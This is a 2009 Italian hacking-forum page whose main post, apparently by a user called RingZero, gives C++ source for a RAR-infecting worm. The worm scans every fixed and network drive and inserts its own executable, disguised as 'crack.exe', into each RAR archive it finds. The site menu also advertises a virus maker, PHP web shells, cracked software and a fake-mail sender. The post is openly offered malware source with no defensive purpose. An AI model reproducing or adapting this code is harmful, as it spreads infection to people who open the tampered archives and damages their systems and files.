KinG-InFeT.NeT  
  Login or Registrare
~  Home  ~  Downloads  ~  Your Account  ~  Forums  ~ Web-Links ~
Futuri aggiornamenti!!: Come avrete visto il sito � stato defacciato quindi data la poka sicurezza del CMS provveder� a cambiare interamente cms e a sistemare + la sicurezza
MENU - KinG-InFeT.NeT
· Home
· Acces Point Pwd-Default
· Archivio Exploit
· Ascii Tables
· Button Maker
· Cerca
· Codice Fiscale
· Contatta l'Admin
· Crea Avatar
· Dns IP Range
· Downloads
· Dragon Ball Series
· Flash Games
· Forums
· Genera Pass
· Geo-IP
· GuestBook
· HaCkEr-GaMe
· Home Page Flash Creator
· Image Hosting
· Invia una Fake-Mail
· l'HostName sapendo l'IP
· La migliore Distro Linux
· Lista Comandi UNIX
· Lista Utenti
· logo Creator
· MD5-Cracker Online
· MD5/SHA1 Generate
· Messaggi Privati
· MsN Account List
· My Personal Site
· Naviga Anonimo
· News dal Mondo dell'inf.
· Nick Name Maker
· No-Paste
· NuKe-TooLz
· NukeSentinel
· PaPeRs - TuToRiAl
· Proxy List
· Ricerca Satellitare
· Segnala Questo Sito
· Segnalami un Bug
· Smiley Generation
· Statistiche
· Top 10
· Total Search
· Userbar Creator
· WebLinks
· WordList
· XSS New Cheat List
 
Linkaci

Linkaci:

KinG-InFeT.NeT


 
Tool

Accedi al pannello di

Coding/Decoding - Tool


� By KinG-InFeT

 
Ricerca dominio
Registra il tuo Dominio Su Aruba :



 
Ultimi Download
Gli ultimi 10 Download
· 1: Shellr57
· 2: EVEREST Ultimate Edition v5.01.1700 + SERIALS
· 3: The Metasploit Project - Framework
· 4: Tanable Nessus Network Security Scanner
· 5: EtherApe
· 6: ntop - network top
· 7: Dsniff
· 8: Ettercap
· 9: TCPDUMP/LIBPCAP
· 10: Kismet


Top 10 Download
· 1: MsN-CrAsH [45]
· 2: Doork GooGle [44]
· 3: Acunetix Web Vulnerability Scanner 6 [40]
· 4: Virus Maker v 1.0 - NO LAMER! [38]
· 5: Matrix Effect [35]
· 6: Super Scan 4 [34]
· 7: Neo.Trace.Pro.v3.25 [32]
· 8: Cain & Abel [30]
· 9: FaKe-Mail [27]
· 10: ShellC99 [23]
 
Attack Hack Blocks
Questo è l'elenco degli indirizzi IP bloccati da NukeSentinel(tm).

· 79.46.31.224  - Script
· 79.10.29.101  - Script
· 79.54.99.183  - Script
· 72.51.46.230  - Admin
· 151.62.49.23  - Script
· 62.10.78.76  - Script
· 79.49.140.223  - Union
· 79.47.98.214  - Script
· 79.52.183.175  - Script
· 79.41.179.252  - Script
· 78.142.140.194  - Script
· 79.13.4.35  - Script
· 79.53.176.25  - Script
· 79.53.197.134  - Union
· 80.240.220.83  - CLike
· 79.36.13.104  - CLike
· 88.198.36.73  - Script
· 151.33.145.2  - Union
· 79.43.95.254  - Script
· 79.9.19.62  - Script

NukeSentinel™
 
KinG-InFeT.NeT: Forums

KinG-InFeT.NeT - Ufficial Forum :: Leggi il Topic - [C++] RAR Injcection
 
 FAQFAQ   CercaCerca   Lista degli utentiLista degli utenti   Gruppi utentiGruppi utenti 
 ProfiloProfilo   Messaggi PrivatiMessaggi Privati   LoginLogin 

[C++] RAR Injcection

 
Nuovo Topic   Rispondi    Indice del forum -> Programmazione C/C++
Precedente :: Successivo  
Autore Messaggio
admin
Founder
Founder


Registrato: Oct 03, 2008
Messaggi: 261

MessaggioInviato: Mer Apr 15, 2009 12:01 am    Oggetto: [C++] RAR Injcection Rispondi citando

rar-inject.cpp

Codice:
char wormpath[MAX_PATH];
void InfectDrive()
{
   WIN32_FIND_DATA wfd;
   HANDLE hfind;
   char fullpath[MAX_PATH];
   LPTSTR xaddr=NULL;
   hfind=FindFirstFile("*.*",&wfd);

   if(hfind!=INVALID_HANDLE_VALUE)
   {
      do
      {
         if(wfd.cFileName[0]!='.')
         {
            wfd.dwFileAttributes&=FILE_ATTRIBUTE_DIRECTORY;
            if(wfd.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY) //is directory ?
            {
               if(SetCurrentDirectory(wfd.cFileName)==TRUE)
               {
                  InfectDrive();
                  SetCurrentDirectory("..");   //return to upper directory
               }
            }
            else
            {
               if(GetFullPathName(wfd.cFileName,MAX_PATH,fullpath,&xaddr)!=0)
               {
                  CharLower(fullpath);

                  if(memcmp(fullpath+lstrlen(fullpath)-3,"rar",3)==0)
                  {
                     Sleep(5000);
                     lstrcat("apa","apa");
                     AddToRar(fullpath,wormpath,"crack.exe",FILE_ATTRIBUTE_NORMAL);
                  }
               }
            }
         }
      }while(FindNextFile(hfind,&wfd));
      FindClose(hfind);
   }
}

DWORD WINAPI RarWorm(LPVOID xvoid)
{
   char Drive[]="z:\\";
   UINT drive_type;

   if(GetModuleFileName(NULL,wormpath,MAX_PATH)==0)
      ExitThread(0);

   do
   {
      drive_type=GetDriveType(Drive);   
     
      if(drive_type==DRIVE_FIXED || drive_type==DRIVE_REMOTE)
      {
         if(SetCurrentDirectory(Drive)==TRUE)
            InfectDrive();   
      }

      Drive[0]--;

   }while(Drive[0]!='b');

   return 1;
}


rar-inject-add.cpp

Codice:
#pragma pack(push, 1)

typedef struct RAR_FILE_HEADER
{
   WORD   HEAD_CRC;
   BYTE   HEAD_TYPE;
   WORD   HEAD_FLAGS;
   WORD   HEAD_SIZE;
   DWORD   PACK_SIZE;
   DWORD   UNP_SIZE;
   BYTE   HOST_OS;
   DWORD   FILE_CRC;
   DWORD   FTIME;
   BYTE   UNP_VER;
   BYTE   METHOD;
   WORD   NAME_SIZE;
   DWORD   ATTR;
}RarFileHeader;

#pragma pack(pop)

DWORD crc32(void *xdata,int xsize)
{
   HGLOBAL crc32table;
   DWORD retvalue;
   crc32table=GlobalAlloc(GPTR,0x400);
   if(crc32table!=NULL)
   {
      __asm
      {
         ;build crc32 table
         ;---------------------
         mov      edi,crc32table
         xor      ecx,ecx
   L2:      push   ecx
         mov      eax,ecx
         mov      ecx,8h
   L1:      mov      edx,eax
         and      edx,1h
         jne      equ_1
         shr      eax,1h
         jmp      __1
   equ_1:  shr      eax,1h
         xor      eax,0edb88320h ;polynomial
   __1:    loop   L1
         stosd
         pop      ecx
         inc      ecx
         cmp      ecx,100h
            jb      L2
         ;calc crc32 checksum
         ;-------------------
         mov      esi,xdata
         mov      edi,xsize
         xor      ecx,ecx
         mov      ebx,0ffffffffh
   crc:   push   ecx
         xor      eax,eax
         lodsb
         mov      edx,ebx
         shr      ebx,8h
         push   ebx
         xchg   edx,ebx
         and      ebx,0ffh
         xor      ebx,eax
         xchg   eax,ebx
         mov      ecx,4h
         mul      ecx
         xchg   eax,ebx
         mov      eax,crc32table
         add      eax,ebx
         mov      eax,dword ptr [eax]
         pop      ebx
         xor      eax,ebx
         mov      ebx,eax
         pop      ecx
         inc      ecx
         cmp      ecx,edi
         jb      crc
         not      eax
         mov      retvalue,eax
      }
      GlobalFree(crc32table);
      return(retvalue);
   }
   return 0;
}


BOOL AddToRar(char RarFile[],char FileToAdd[],char PackedFileName[],DWORD Attributes)
{

   unsigned char RarMainHeader[20] = // Rar_MARK_HEAD & Rar_MAIN_HEAD
   {
      0x52, 0x61, 0x72, 0x21, 0x1A, 0x07, 0x00, 0xCF, 0x90, 0x73,
      0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   } ;

   unsigned char EndOfRar[7]=
   {
      0xC4, 0x3D, 0x7B, 0x00, 0x40, 0x07, 0x00,
   };

   HANDLE hrarfile,hfile,hmap,mapbase;

   DWORD IO_Buffer,FileSize,RarFileSize;

   RarFileHeader RarHeader;

   char WorkBuffer[128],*WBp;

   hfile=CreateFile(FileToAdd,GENERIC_READ,FILE_SHARE_READ,0,
      OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);

   if(hfile==INVALID_HANDLE_VALUE)   
      return FALSE;


   FileSize=GetFileSize(hfile,NULL);

   if(FileSize==0xFFFFFFFF)
   {
      CloseHandle(hfile);
      return FALSE;
   }

   hrarfile=CreateFile(RarFile,GENERIC_WRITE,FILE_SHARE_READ,0,
      OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);

   if(hrarfile==INVALID_HANDLE_VALUE)
   {
      hrarfile=CreateFile(RarFile,GENERIC_WRITE,FILE_SHARE_READ,0,
      CREATE_NEW,FILE_ATTRIBUTE_NORMAL,0);

      if(hrarfile==INVALID_HANDLE_VALUE)      //if we fail exit
      {
         CloseHandle(hfile);
         return FALSE;
      }
      WriteFile(hrarfile,&RarMainHeader,sizeof(RarMainHeader),&IO_Buffer,NULL);

   }
   else
   {

      RarFileSize=GetFileSize(hrarfile,NULL);

      if(RarFileSize==0xFFFFFFFF)
      {
         CloseHandle(hfile);
         CloseHandle(hrarfile);
         return FALSE;
      }
      SetFilePointer(hrarfile,RarFileSize-sizeof(EndOfRar),NULL,FILE_BEGIN);
   }
   hmap=CreateFileMapping(hfile,NULL,PAGE_READONLY,NULL,NULL,NULL);

   if(hmap==NULL)            //fail ?
   {
      CloseHandle(hfile);
      CloseHandle(hrarfile);
      return FALSE;
   }

   mapbase=MapViewOfFile(hmap,FILE_MAP_READ,NULL,NULL,NULL);

   if(mapbase==NULL)         //fail ?
   {
      CloseHandle(hmap);
      CloseHandle(hfile);
      CloseHandle(hrarfile);
      return FALSE;
   }
   memset(&RarHeader,0,sizeof(RarHeader));         //zero struct

   RarHeader.HEAD_TYPE=0x74;
   RarHeader.FILE_CRC=crc32(mapbase,FileSize);      //calc & set the added file crc32
   RarHeader.HEAD_FLAGS=0x8000;
   RarHeader.METHOD=0x30;
   RarHeader.UNP_VER=0x14;
   RarHeader.ATTR=Attributes;
   RarHeader.UNP_SIZE=FileSize;
   RarHeader.PACK_SIZE=FileSize;
   RarHeader.NAME_SIZE=lstrlen(PackedFileName);
   RarHeader.HEAD_SIZE=(sizeof(RarHeader)+RarHeader.NAME_SIZE);
   memset(WorkBuffer,0,sizeof(WorkBuffer));
   memcpy(WorkBuffer,&RarHeader,sizeof(RarHeader));
   WBp=WorkBuffer;
   WBp+=sizeof(RarHeader);
   memcpy(WBp,PackedFileName,RarHeader.NAME_SIZE);
   crc32(WorkBuffer+2,sizeof(RarHeader)+RarHeader.NAME_SIZE-2);   //+2 = skip the HEAD_CRC field

   __asm
   {
      mov word ptr [RarHeader.HEAD_CRC],ax
   }
   WriteFile(hrarfile,&RarHeader,sizeof(RarHeader),&IO_Buffer,NULL);

   WriteFile(hrarfile,PackedFileName,RarHeader.NAME_SIZE,&IO_Buffer,NULL);

   WriteFile(hrarfile,mapbase,FileSize,&IO_Buffer,NULL);

   WriteFile(hrarfile,EndOfRar,sizeof(EndOfRar),&IO_Buffer,NULL);

   //close/unmap files

   UnmapViewOfFile(mapbase);
   CloseHandle(hmap);
   CloseHandle(hfile);
   CloseHandle(hrarfile);

   return TRUE;
}


by RingZero
Torna in cima
Profilo Messaggio privato Invia email HomePage MSN Messenger
Mostra prima i messaggi di:   
Nuovo Topic   Rispondi    Indice del forum -> Programmazione C/C++ Tutti i fusi orari sono GMT + 1 ora
Pagina 1 di 1

 
Vai a:  
Non puoi inserire nuovi Topic in questo forum
Non puoi rispondere ai Topic in questo forum
Non puoi modificare i tuoi messaggi in questo forum
Non puoi cancellare i tuoi messaggi in questo forum
Non puoi votare nei sondaggi in questo forum


CoPyRiGhT 2009 By KinG-InFeT
PhpBB Copiright 2009
Tutti I Diritti Riservati
Forums ©


Valid robots.txt
CoPyRiGhT © 2009/2010 By KinG-InFeT.NeT - Tutti i Diritti Riservati ®

Generazione pagina: 0.07 Secondi

Coder By KinG-InFeT